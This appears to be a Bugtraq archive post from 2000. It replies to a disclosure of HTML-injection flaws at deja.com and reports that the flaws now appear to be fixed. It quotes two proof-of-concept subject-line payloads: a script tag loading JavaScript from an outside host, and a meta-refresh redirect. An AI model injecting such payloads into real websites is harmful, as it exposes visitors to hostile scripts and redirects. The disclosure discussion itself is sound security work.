Bugtraq mailing list archives

Re: Malicious-HTML vulnerabilities at deja.com

From: geert () UTTNARAG TN UTWENTE NL (Geert Altena)
Date: Fri, 17 Mar 2000 12:31:46 +0100


You, Niall Smart, <niall () POBOX COM>, wrote:

deja.com does not always escape meta-characters when displaying

                ^^^^^^^^^^

Usenet articles.  Specifically, the article view page
(http://www.deja.com/getdoc.xp) and the thread view page
(http://www.deja.com/viewthread.xp) display the subject of the
article "as is" between title tags.

Examples
========

JavaScript popup:

  http://www.deja.com/getdoc.xp?AN=591804116


Comes out as (copy/paste from netscape):
------------

Forum: alt.test
Thread: </title><script
src="http://www.in-design.com/~nsmart/foo.js";></script><body
onLoad="return bar()">
Message 1 of 1


Subject: </title><script src="http://www.in-design.com/~nsmart/foo.js";>
         </script><body onLoad="return bar()">
Date: 03/01/2000
Author: regkey <regkey () yahoo com>
--------------

I have javascript enabled, no popup.

Redirection using meta tag:

  http://www.deja.com/getdoc.xp?AN=591833344


Comes out as:
-----------------

Forum: alt.test
Thread: </title><meta http-equiv="refresh"

           content="0;url=http://www.in-design.com/~nsmart/deja.html";>

Message 1 of 1

Subject: </title><meta http-equiv="refresh"
         content="0;url=http://www.in-design.com/~nsmart/deja.html";>
Date: 03/01/2000
Author: regkey <regkey () yahoo com>
--------------------

No redirection here to www.in-design.com.

Looking at the source, in both cases (javascript and meta rerefresh) the
"<" and ">" are properly replaced by "&lt;" and "&gt;" eliminating the
vulnerabilities you mentioned. Same thing applies then I get the article
via powersearch.

So either someone at Deja reads Bugtraq and did a fix before this reply or
this is a case where things _are_ properly escaped.

Cheers,
\Geert.

--
Geert Altena | Geert () uttnarag tn utwente nl | Coffee, black, no sugar
         Finger for PGPkey : Diffie-Hellman 2048/0xC540C550
  Prediction is difficult, especially of the future. - (Niels Bohr)

Current thread:

FW: [NTBUGTRAQ] AT Jobs - Denial of serice/Privilege Elevation DeAvillez, Carlos (Mar 14)
- Malicious-HTML vulnerabilities at deja.com Niall Smart (Mar 15)
  - Re: Malicious-HTML vulnerabilities at deja.com Geert Altena (Mar 17)
- Re: FW: [NTBUGTRAQ] AT Jobs - Denial of serice/Privilege Elevation Andy Caus (Mar 16)
  - Re: FW: [NTBUGTRAQ] AT Jobs - Denial of serice/Privilege Elevation Daniel Harter (Mar 17)
- OfficeScan TrendMicro: admin for everybody ! Gregory Duchemin (Mar 16)
- Analysis of the Shaft distributed denial of service tool Sven Dietrich (Mar 16)
  - Re: Analysis of the Shaft distributed denial of service tool Max Vision (Mar 17)